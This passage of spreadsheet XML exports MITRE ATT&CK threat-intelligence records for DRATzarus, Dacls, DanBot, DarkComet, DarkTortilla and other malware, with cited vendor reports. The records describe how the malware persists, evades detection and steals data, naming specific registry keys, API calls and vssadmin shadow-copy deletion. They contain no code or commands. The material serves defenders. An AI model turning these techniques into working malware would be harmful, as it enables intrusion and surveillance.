    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is encrypted using single-byte XOR.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b09cad27-7b44-4a57-adf8-dcbcb3cdcb0a</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of capturing screenshots of the victim's machine.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--8d761618-146f-4219-9b50-a4ceca6b2210</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can collect information from a compromised host.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--572a0bc0-58e6-4a8e-a28c-7d8be0bfd781</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use `IsDebuggerPresent` to detect whether a debugger is present on a victim.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--50446870-ba6c-4d0c-b657-586a6cba8903</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can deploy additional tools onto an infected machine.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--6684ebb4-cab6-4443-a539-f71bdddbf15c</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) has been named `Flash.exe`, and its dropper has been named `IExplorer`.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--7c73e018-a001-4de1-a607-3add2242bd73</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use various API calls to see if it is running in a sandbox.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--961e9aba-801c-45a4-b1a9-0717761a0f62</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can be partly encrypted with XOR.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--def1a889-9341-4179-9d14-a5c10aa100b2</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can enumerate and examine running processes to determine if a debugger is present.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--aca452f1-d08e-4975-81b2-e93b56910d67</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can search for other machines connected to compromised host and attempt to map the network.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--86a7ffc8-6107-4854-96a7-d39f8bb4069f</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694)'s dropper can be packed with UPX.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--a5347b54-6020-4e8e-acef-6428731cbd7d</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can obtain a list of users from an infected machine.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--022ba33a-16f4-40de-b0b2-4961870aa0c9</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--52516649-550a-4930-8ed1-27391aad0379</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</si>
  <si>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</si>
  <si>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relationship--c1db186f-0c57-4c10-b858-3ecc792bb224</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use HTTP or HTTPS for C2 communications.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--b76abf9c-e38e-4a33-ae5f-7e9f1dad00b9</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can scan directories on a compromised host.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--e76a5485-4008-4096-820c-87b7dede9e02</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) has had its payload named with a dot prefix to make it hidden from view in the Finder application.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--dff93811-e9f1-430e-95d3-344a067b2e23</t>
  </si>
  <si>
    <t>07 August 2020</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can download its payload from a C2 server.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--38affc70-544f-4211-be66-0d09f7882edb</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a LaunchAgent.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--4c391d8f-4db1-43b3-857e-b8c507f27bdb</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a Launch Daemon.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--c592018f-2dd6-4787-b429-c25e69d6f1cd</t>
  </si>
  <si>
    <t>The [Dacls](https://attack.mitre.org/software/S0497) Mach-O binary has been disguised as a .nib file.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--ebfa89db-b37b-4b66-a820-b863bd012b80</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can encrypt its configuration file with AES CBC.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--70f6f99e-d791-4af9-b9c2-23b58fc64546</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can collect data on running and parent processes.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--4001577c-16aa-4edc-ba15-1f0f9ba35c13</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--3b1aef91-72a6-4eae-bbc9-94fccc7b4118</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use use IPv4 A records and IPv6 AAAA DNS records in C2 communications.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--5c45d533-4299-47a0-9a3b-7085c219ba6a</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can upload files from compromised hosts.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--626fcdd2-aaef-4670-ac9e-112c59151f95</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use a VBA macro to decode its payload prior to installation and execution.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--d0146a8e-8658-40c4-8232-bec51e1ab9a2</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can delete its configuration file after installation.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--44cda13f-01b1-4fd2-8fbc-7de746c00d65</t>
  </si>
  <si>
    <t>13 June 2022</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can download additional files to a targeted system.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--6bfbee18-c771-4260-b460-8058dbc5c08a</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) has relied on victims' opening a malicious file for initial execution.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--57c8dc86-93a0-43d6-a47c-f0f5892948b3</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--1617d3d7-77c9-4a6b-bdd6-8914e0890495</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can Base64 encode its payload.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--4272f467-c1b9-412e-9092-6340f4bdf847</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use a scheduled task for installation.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--08c8fe77-b0b9-45e7-a2bf-e09257fa83f7</t>
  </si>
  <si>
    <t xml:space="preserve">[DanBot](https://attack.mitre.org/software/S1014) has been distributed within a malicious Excel attachment via spearphishing emails.(Citation: SecureWorks August 2019) </t>
  </si>
  <si>
    <t>relationship--721320d4-36f0-4449-8331-8fbe40b1dba5</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use VNC for remote access to targeted systems.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--31994fdc-6f52-4052-9748-d2bd3ea60caa</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use a VBA macro embedded in an Excel file to drop the payload.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--9366e845-6a49-44f4-abb6-c2cada6dff5a</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use HTTP in C2 communication.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--79d38aef-d99a-4abc-a643-c334e41173f7</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) has the ability to execute arbitrary commands via `cmd.exe`.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--aa64ac0b-3c22-41ad-bcd5-ee56d59de503</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can listen in to victims' conversations through the system’s microphone.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--b9f6e673-8c15-465e-9ef0-2bcc8efc586e</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can steal data from the clipboard.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--28b56048-87a7-4204-b55b-3f2f79f9073f</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can execute various types of scripts on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--1d1eaec4-ceeb-4fda-b177-f92fad7d3e44</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like the Windows Firewall.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--a1d5c2d2-92f7-4cfa-bd1d-fa06e18c0f33</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like anti-virus.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--bf01b245-8a42-4fd3-9b77-ec411336b62d</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can load any files onto the infected machine to execute.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--75f88090-55cb-4b3b-84af-cf51058c3ccc</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has a keylogging capability.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>relationship--da288184-6537-4a23-b26e-e4329690bddb</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has dropped itself onto victim machines with file names such as WinDefender.Exe and winupdate.exe in an apparent attempt to masquerade as a legitimate file.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>relationship--f82724f9-846b-442e-826c-a38a74a93737</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</si>
  <si>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</si>
  <si>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relationship--c88e7db9-47b1-4fe9-943a-98ebde29980b</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can list active processes running on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--7c60bccc-f485-403d-ab3b-db861a3a4429</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) adds several Registry entries to enable automatic execution at every system startup.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--aeb0762f-0d0e-43b8-be6f-413f60097e02</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can open an active screen of the victim’s machine and take control of the mouse and keyboard.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--a1dfbc65-48dc-4218-a10c-906fbe33b6db</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has the option to compress its payload using UPX or MPRESS.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--c241606f-e0e2-4179-8e8d-444fb1406df4</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can collect the computer name, RAM used, and operating system version from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--62442f37-7a0e-4945-b498-2d02306e53c7</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) gathers the username from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>relationship--e96e17e7-4349-4393-b875-5bab4e8ffa5a</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can access the victim’s webcam to take pictures.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--30b85048-ba1f-4b43-b9bc-69c27e426039</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can use HTTP for C2 communications.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--b5508866-69f6-4bbe-8906-9de0148d9834</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can launch a remote shell to execute commands on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>relationship--957f81a6-81cb-4279-8c88-1a0a73c2e0d6</t>
  </si>
  <si>
    <t>S1066</t>
  </si>
  <si>
    <t>DarkTortilla</t>
  </si>
  <si>
    <t>malware--5faaf81a-aa5b-4a4b-bae5-522439e068f8</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--35dde9bf-4f03-4244-ae30-d2ddfdc450b1</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can download a clipboard information stealer module.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--778aa9ba-0561-44bd-a28f-94ba2b12f78b</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) has used the `WshShortcut` COM object to create a .lnk shortcut file in the Windows startup folder.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--bb88cf08-f9af-44af-b082-96100a7fc3f4</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</si>
  <si>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</si>
  <si>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relationship--c6cc5a76-522d-4b48-ae5b-4867fa87f2c6</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can decrypt its payload and associated configuration elements using the Rijndael cipher.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--0977c267-10f9-4e4d-a947-464359c7a4ba</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can use a .NET-based DLL named `RunPe6` for process injection.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--15f40e8e-7ddd-47f8-a11d-fbebc2c4d3fa</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) has used `%HiddenReg%` and `%HiddenKey%` as part of its persistence via the Windows registry.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--662dd798-61ce-4463-8567-9acdecade943</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</si>
  <si>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</si>
  <si>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relationship--02c8a28f-c188-47a9-ab93-d9abb862abab</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can check for internet connectivity by issuing HTTP GET requests.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--8d5fe299-0c6c-4719-8125-d9576ddbff32</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can download a keylogging module.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--7b88429e-9024-442f-a40c-d9ea5d0320e1</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) has relied on a user to open a malicious document or archived file delivered via email for initial execution.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--80219528-7b8e-415a-b2f2-c3678bccc185</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066)'s payload has been renamed `PowerShellInfo.exe`.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--5c6230da-a47d-435f-9836-49648f03e76e</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) has modified registry keys for persistence.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--d6bb4c39-f4d1-41aa-8b0a-363f198ed6ab</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can use a variety of API calls for persistence and defense evasion.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--b00ac705-cb96-4c05-9e90-b2663387d80c</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) has been obfuscated with the DeepSea .NET and ConfuserEx code obfuscators.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--0b58e2e5-9be5-4132-a65f-19db8acd7033</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can enumerate a list of running processes on a compromised system.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--834c3c4d-b282-47e3-bca9-77f3b17f2f11</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) has established persistence via the `Software\Microsoft\Windows NT\CurrentVersion\Run` registry key and by creating a .lnk shortcut file in the Windows startup folder.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--2b3dc227-2ce1-41fa-8d1c-4c0d3685258d</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can check for the Kaspersky Anti-Virus suite.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--3c155a7b-d51d-4290-a663-3e5cf022d6e4</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) has been distributed via spearphishing emails containing archive attachments, with file types such as .iso, .zip, .img, .dmg, and .tar, as well as through malicious documents.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--1813df9f-2bd9-4451-b4dd-aa80716ce151</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can search a compromised system's running processes and services to detect Hyper-V, QEMU, Virtual PC, Virtual Box, and VMware, as well as Sandboxie.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--6d9ee797-4756-4a89-ab19-2ece0c96e533</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can obtain system information by querying the `Win32_ComputerSystem`, `Win32_BIOS`, `Win32_MotherboardDevice`, `Win32_PnPEntity`, and `Win32_DiskDrive` WMI objects.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--48a5b14e-81c8-4629-a846-7c8273bc3963</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can retrieve information about a compromised system's running services.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--ba27eb37-39dc-47ee-b87f-95525878582e</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can implement the `kernel32.dll` Sleep function to delay execution for up to 300 seconds before implementing persistence or processing an addon package.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--323863fd-c133-45f4-9628-b09b039b7c31</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) has used HTTP and HTTPS for C2.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can retrieve its primary payload from public sites such as Pastebin and Textbin.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--b14227d3-b032-482d-a19a-6dcdc0f10c9c</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can use `cmd.exe` to add registry keys for persistence.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--3f2c9c58-21e8-409f-9b64-02f228232d15</t>
  </si>
  <si>
    <t>[DarkTortilla](https://attack.mitre.org/software/S1066) can use WMI queries to obtain system information.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--a0f0d977-ccb9-4634-9b0a-f6887be60b4c</t>
  </si>
  <si>
    <t xml:space="preserve"> [DarkTortilla](https://attack.mitre.org/software/S1066) has established persistence via the `Software\Microsoft\Windows NT\CurrentVersion\Winlogon` registry key.(Citation: Secureworks DarkTortilla Aug 2022)</t>
  </si>
  <si>
    <t>relationship--2d14ce48-92d3-446d-84f3-a0df761e08fb</t>
  </si>
  <si>
    <t>S0673</t>
  </si>
  <si>
    <t>DarkWatchman</t>
  </si>
  <si>
    <t>malware--63686509-069b-4143-99ea-4e59cad6cb2a</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) reports window names along with keylogger information to provide application context.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--42c6147c-8626-4ea1-bc69-7b35ea69e2ed</t>
  </si>
  <si>
    <t>11 January 2022</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can use TLS to encrypt its C2 channel.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--92dc3823-559b-422a-b801-4669d53f0135</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can retrieve browser history.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--7e160715-2735-4d96-8918-14036c2804a7</t>
  </si>
  <si>
    <t>10 January 2022</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has used Base64 to encode PowerShell commands.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--6bca8252-8339-470b-a994-519eee5ea3ec</t>
  </si>
  <si>
    <t xml:space="preserve">[DarkWatchman](https://attack.mitre.org/software/S0673) has used the &lt;code&gt;csc.exe&lt;/code&gt; tool to compile a C# executable.(Citation: Prevailion DarkWatchman 2021) </t>
  </si>
  <si>
    <t>relationship--d2260326-b220-46e4-ba11-3f14ec89f45f</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can collect files from a compromised host.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--a1d982c7-bb95-4533-9feb-05c5350b8359</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has the ability to self-extract as a RAR archive.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--a6bb9c7f-3e1c-429a-a81d-0d446f4abe9a</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has used a DGA to generate a domain name for C2.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--6be9fb86-54b4-4979-95f8-c2a27cba785c</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has been observed deleting its original launcher after installation.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--10a4e987-0b9d-4ea1-b82f-4b93d6a10a45</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has the ability to enumerate file and folder names.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--68130387-da58-4676-889b-0b8c5b2c3a65</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can store configuration strings, keylogger, and output of components in the Registry.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--19151c17-b3cb-436f-88dc-16aabd96e04f</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can uninstall malicious components from the Registry, stop processes, and clear the browser history.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--f54e5455-c539-4bcb-9a06-92440314324f</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can delete shadow volumes using &lt;code&gt;vssadmin.exe&lt;/code&gt;.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--331e8ea2-15c4-4cba-8a26-163b24d819b7</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) uses JavaScript to perform its core functionalities.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--fdbd14e9-fffa-4120-a979-24eead47ffa4</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can track key presses with a keylogger module.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--de539175-4740-4d78-a46d-5555be905dcf</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can stage local data in the Windows Registry.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--343c6e94-fda1-41d6-865e-6a30570afb98</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has used an icon mimicking a text file to mask a malicious executable.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--e67bb9cd-a76c-4666-a3e5-1e466dceb22b</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can modify Registry values to store configuration strings, keylogger, and output of components.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--2e126b9a-f902-4077-963e-64185c9544ff</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has been delivered as compressed RAR payloads in ZIP files to victims.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--2a3a4c9d-36d5-42c9-9375-063772d70e88</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can list signed PnP drivers for smartcard readers.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--ff2f9b25-f36a-4031-8013-1e746cc40948</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can execute PowerShell commands and has used PowerShell to execute a keylogger.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--43ec2047-44fb-49a5-b24a-9edcb5378e5c</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can query the Registry to determine if it has already been installed on the system.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--794caee4-34cd-493f-a047-1f4a8b4c8de8</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has created a scheduled task for persistence.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--d7563ead-61fb-4f5e-8832-64ce81c0ecb1</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can search for anti-virus products on the system.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--d880473f-da6f-452b-8ea4-5723ab87226c</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can load DLLs.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--7bbc0809-d6ba-4be5-9397-e44b9481f317</t>
  </si>
  <si>
